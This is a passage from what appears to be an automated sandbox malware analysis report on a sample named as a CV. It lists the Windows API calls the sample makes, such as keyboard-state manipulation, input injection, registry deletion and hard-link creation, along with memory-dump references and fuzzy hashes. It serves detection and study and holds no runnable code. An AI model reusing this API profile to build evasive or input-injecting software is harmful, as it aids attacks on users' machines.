                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressLibraryLoadProc
                                                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                            • API String ID: 2574300362-1355242751
                                                                                            • Opcode ID: ae2341d38c21d83fadc0472b384fac3165833c416ef6c9af0ad9199261a2b416
                                                                                            • Instruction ID: a6d1d3838a5114c19c7b4327a5f613c4c49bea5e9090f352efe58ab5658c27a3
                                                                                            • Opcode Fuzzy Hash: ae2341d38c21d83fadc0472b384fac3165833c416ef6c9af0ad9199261a2b416
                                                                                            • Instruction Fuzzy Hash: DCD0A734504B129FCB204F20FC0CB0976E4BB05701B00841DE955D2570DBB0C8C0C710
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,000C41BB,000C4341,?,000C422F,?,000C41BB,?,?,?,?,000C39FE,?,00000001), ref: 000C4359
                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 000C436B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressLibraryLoadProc
                                                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                            • API String ID: 2574300362-3689287502
                                                                                            • Opcode ID: 741fda36d0e42be1ebeb587bda774dad8905a93a3f59aa8a0ec0a4f9ec572611
                                                                                            • Instruction ID: 1ae1e189561933ea776f48d17227c9f11b4901c7b0d0de30db7129846f233dcc
                                                                                            • Opcode Fuzzy Hash: 741fda36d0e42be1ebeb587bda774dad8905a93a3f59aa8a0ec0a4f9ec572611
                                                                                            • Instruction Fuzzy Hash: 4FD0A774504B129FCB204F30F808B0676E4BB11B15B00841DE895D2560DBB0D8C0C710
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(oleaut32.dll,?,0010051D,?,001005FE), ref: 00100547
                                                                                            • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00100559
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressLibraryLoadProc
                                                                                            • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                            • API String ID: 2574300362-1071820185
                                                                                            • Opcode ID: 8d657927776d52ca5700c81e6a56fedf4aef7b44b1ea4cf1a7414cb1842f9ed3
                                                                                            • Instruction ID: fdc94949af55e9c9ebba449276c8ed0c633921baa5aa558b2d15dcfcb885aec4
                                                                                            • Opcode Fuzzy Hash: 8d657927776d52ca5700c81e6a56fedf4aef7b44b1ea4cf1a7414cb1842f9ed3
                                                                                            • Instruction Fuzzy Hash: 9BD09E745447129EDB219B65BC0964176B4AB19711F10C459E89AD25A0D7B0C8858A50
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0010052F,?,001006D7), ref: 00100572
                                                                                            • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00100584
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressLibraryLoadProc
                                                                                            • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                            • API String ID: 2574300362-1587604923
                                                                                            • Opcode ID: 38a2440983ac49608305db03e62a466b5c7708bf4e15187c88d05b0b45788b1a
                                                                                            • Instruction ID: fad05d9af6e4f9f85101031d8bffb42299d11443b8209601f75e69a25e448950
                                                                                            • Opcode Fuzzy Hash: 38a2440983ac49608305db03e62a466b5c7708bf4e15187c88d05b0b45788b1a
                                                                                            • Instruction Fuzzy Hash: 30D05E345003129ACB205F30AC08B0277F4AB09710F108419EC85E26A0D7B0C9C08B20
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,0011ECBE,?,0011EBBB), ref: 0011ECD6
                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0011ECE8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressLibraryLoadProc
                                                                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                            • API String ID: 2574300362-1816364905
                                                                                            • Opcode ID: eccc34621f072afa0ae3b91520ae885e2f0833aa35615471f6fbc8ea2bbdafb9
                                                                                            • Instruction ID: 8d34e2f7fcb15e4bfd5b814e2835389a609e14acd370ec55c827f1b3663595d4
                                                                                            • Opcode Fuzzy Hash: eccc34621f072afa0ae3b91520ae885e2f0833aa35615471f6fbc8ea2bbdafb9
                                                                                            • Instruction Fuzzy Hash: DFD05E345007239FCB245BA0AC4874276E4AB02700B008429FC4A92560DB70C8C09A50
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0011BAD3,00000001,0011B6EE,?,0015DC00), ref: 0011BAEB
                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0011BAFD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressLibraryLoadProc
                                                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                                                            • API String ID: 2574300362-199464113
                                                                                            • Opcode ID: ff3905def216d409871453ec4ed4568bb095fed0e8effc278581c800e3f1bbd7
                                                                                            • Instruction ID: 366122f320b995e1ee374f6549117b7f7efdb6b7e7a4d1d9ad788409e3200b5c
                                                                                            • Opcode Fuzzy Hash: ff3905def216d409871453ec4ed4568bb095fed0e8effc278581c800e3f1bbd7
                                                                                            • Instruction Fuzzy Hash: 1AD0A7349087129FCB345F20FC88B9176F4AB01700B108429FC47D2960DB70C8C0C714
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,00123BD1,?,00123E06), ref: 00123BE9
                                                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00123BFB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressLibraryLoadProc
                                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                            • API String ID: 2574300362-4033151799
                                                                                            • Opcode ID: f43aa8a514825086829893aa16324dfebcf443df998894a2a719fa78b5d404af
                                                                                            • Instruction ID: 8d1d24e0152664e068c970ec455ee38cc6e09b431b0cbe0241c9648228b2c7c5
                                                                                            • Opcode Fuzzy Hash: f43aa8a514825086829893aa16324dfebcf443df998894a2a719fa78b5d404af
                                                                                            • Instruction Fuzzy Hash: B8D0C7746007629FDB205F65F809643FAF4AB07715B10845EF859E2660D7B4D5D4CE50
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 61511734509a1ed6db42770cda69011a823d11489bc5cba7322afe91a48c64e3
                                                                                            • Instruction ID: 355364dc175c39302bbd582d072dff61168cd5a2e92e6f78eede64f456231227
                                                                                            • Opcode Fuzzy Hash: 61511734509a1ed6db42770cda69011a823d11489bc5cba7322afe91a48c64e3
                                                                                            • Instruction Fuzzy Hash: 33C14A75A0021AEFCB14DF94C884BBEB7B5FF48704F104599EA05AB251D771EE81EB90
                                                                                            APIs
                                                                                            • CoInitialize.OLE32(00000000), ref: 0011AAB4
                                                                                            • CoUninitialize.OLE32 ref: 0011AABF
                                                                                              • Part of subcall function 00100213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0010027B
                                                                                            • VariantInit.OLEAUT32(?), ref: 0011AACA
                                                                                            • VariantClear.OLEAUT32(?), ref: 0011AD9D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                            • String ID:
                                                                                            • API String ID: 780911581-0
                                                                                            • Opcode ID: deb806e255d88aa587158a8cb502bbafa17eed14e28bf5da68bf59cfa29e0069
                                                                                            • Instruction ID: d3e70fead669343c626ebdb9413bab66cd7de7a55683d7b13e5b102ecd1ad345
                                                                                            • Opcode Fuzzy Hash: deb806e255d88aa587158a8cb502bbafa17eed14e28bf5da68bf59cfa29e0069
                                                                                            • Instruction Fuzzy Hash: 03A13875204B01AFCB14DF54C485B9EBBE5BF98710F144459FA9A9B3A2CB30ED44CB86
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Variant$AllocClearCopyInitString
                                                                                            • String ID:
                                                                                            • API String ID: 2808897238-0
                                                                                            • Opcode ID: cc0d88ae958c40cd679c112b1c84383b85a91a3af6c06f8a7296bf44ca4d87a1
                                                                                            • Instruction ID: 88940e074d04fa9c9c7761755a3cbea8c424632eab58149cd5a6814d7810cd7c
                                                                                            • Opcode Fuzzy Hash: cc0d88ae958c40cd679c112b1c84383b85a91a3af6c06f8a7296bf44ca4d87a1
                                                                                            • Instruction Fuzzy Hash: 9251E734A0430A9BDB74AF65D491B7EB3E9EF45314F20881FE746CBAD2DB749980A701
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                            • String ID:
                                                                                            • API String ID: 3877424927-0
                                                                                            • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                                            • Instruction ID: 0613d000ed3fbf8537002152cfd638ddd11d25f47a3790859b0650b55a86a2f7
                                                                                            • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                                            • Instruction Fuzzy Hash: 6551B8B0A04385AFDB348F7B898966E7FF5AF40320F248629F865A72D1D7719F509B40
                                                                                            APIs
                                                                                            • GetWindowRect.USER32(01936660,?), ref: 0012C544
                                                                                            • ScreenToClient.USER32(?,00000002), ref: 0012C574
                                                                                            • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0012C5DA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ClientMoveRectScreen
                                                                                            • String ID:
                                                                                            • API String ID: 3880355969-0
                                                                                            • Opcode ID: 3082e0414b4430a4275f50326de352e3935e5a9deefc6847c2492d6768adeda4
                                                                                            • Instruction ID: bf59c6f96f4c7f1e4880ceccd800f26a2cb3d9c42c013a0170337fe6ad48ce3e
                                                                                            • Opcode Fuzzy Hash: 3082e0414b4430a4275f50326de352e3935e5a9deefc6847c2492d6768adeda4
                                                                                            • Instruction Fuzzy Hash: 53518475A00215EFCF20DF68E880AAE77B6FF55320F208259FA5597290D770ED91CB90
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 000FC462
                                                                                            • __itow.LIBCMT ref: 000FC49C
                                                                                              • Part of subcall function 000FC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 000FC753
                                                                                            • SendMessageW.USER32(?,0000110A,00000001,?), ref: 000FC505
                                                                                            • __itow.LIBCMT ref: 000FC55A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$__itow
                                                                                            • String ID:
                                                                                            • API String ID: 3379773720-0
                                                                                            • Opcode ID: 5871938d7f0b069fb3689d52077df764b903f4d0dbdd97347fed22547afb2172
                                                                                            • Instruction ID: 9d9e493cd7379278d5ede9820010d7354a3505b905eefdb470d0cfbf9e39bb95
                                                                                            • Opcode Fuzzy Hash: 5871938d7f0b069fb3689d52077df764b903f4d0dbdd97347fed22547afb2172
                                                                                            • Instruction Fuzzy Hash: 9941B57160060CAFEF25DF54CD56FFE7BB9AF49700F040019FA05A7192DB70AA859BA1
                                                                                            APIs
                                                                                            • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00103966
                                                                                            • SetKeyboardState.USER32(00000080,?,00000001), ref: 00103982
                                                                                            • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 001039EF
                                                                                            • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00103A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                            • String ID:
                                                                                            • API String ID: 432972143-0
                                                                                            • Opcode ID: 8247a87fcaa5583e9becd8aef1d40694318126bf3ff0cbf3c91f0fef113fd0d5
                                                                                            • Instruction ID: 3f523c666d1038f2683c1d00e54544b418e6173fc5bee5378df37e2924346184
                                                                                            • Opcode Fuzzy Hash: 8247a87fcaa5583e9becd8aef1d40694318126bf3ff0cbf3c91f0fef113fd0d5
                                                                                            • Instruction Fuzzy Hash: 05412470A44208AEEF248B64C80ABFDBBBDAB59314F04011AF4E1972D1CBF48E85D761
                                                                                            APIs
                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0010E742
                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 0010E768
                                                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0010E78D
                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0010E7B9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                            • String ID:
                                                                                            • API String ID: 3321077145-0
                                                                                            • Opcode ID: 6cf2dd95570e1ab5c50fb51dda286640865619fcd7e418792faf3a4e29c21e28
                                                                                            • Instruction ID: 8ef396cc6de5958c603d07309a38fcbe8af46d01a353737e5eaadeca0f3cb408
                                                                                            • Opcode Fuzzy Hash: 6cf2dd95570e1ab5c50fb51dda286640865619fcd7e418792faf3a4e29c21e28
                                                                                            • Instruction Fuzzy Hash: 9E41153A600610DFCF11EF15C445A8DBBE5BF99720B098499F946AB3A2CB70FD40CB91
                                                                                            APIs
                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0012B5D1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: InvalidateRect
                                                                                            • String ID:
                                                                                            • API String ID: 634782764-0
                                                                                            • Opcode ID: 7cc1fc4e6f311a470481a043da273a013964386c318c3664af6734ce0730ebbc
                                                                                            • Instruction ID: 666d30d85e88f95b9e62e5aff7c944911d0e56d9854b89668f80f68d8b5dc33d
                                                                                            • Opcode Fuzzy Hash: 7cc1fc4e6f311a470481a043da273a013964386c318c3664af6734ce0730ebbc
                                                                                            • Instruction Fuzzy Hash: AB31E074608224BFEF248F18FCC9FE837A5EB06310F644111FA51DA6E1D730AAA09B51
                                                                                            APIs
                                                                                            • ClientToScreen.USER32(?,?), ref: 0012D807
                                                                                            • GetWindowRect.USER32(?,?), ref: 0012D87D
                                                                                            • PtInRect.USER32(?,?,0012ED5A), ref: 0012D88D
                                                                                            • MessageBeep.USER32(00000000), ref: 0012D8FE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1352109105-0
                                                                                            • Opcode ID: 771d43aa30959fc70bc1b8bfea08af2aad8ed9779dbc281d0181a8e1293e5a29
                                                                                            • Instruction ID: ed1372c1da0f94438894ce01a60f6af24e9ef24c2e4e2f10e9c1817a8b464b29
                                                                                            • Opcode Fuzzy Hash: 771d43aa30959fc70bc1b8bfea08af2aad8ed9779dbc281d0181a8e1293e5a29
                                                                                            • Instruction Fuzzy Hash: B941BB75A00228EFCF15DF58F884BA9BBF5FF49311F2981A9E9548B260D730E991CB40
                                                                                            APIs
                                                                                            • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00103AB8
                                                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 00103AD4
                                                                                            • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00103B34
                                                                                            • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00103B92
                                                                                            Memory Dump Source
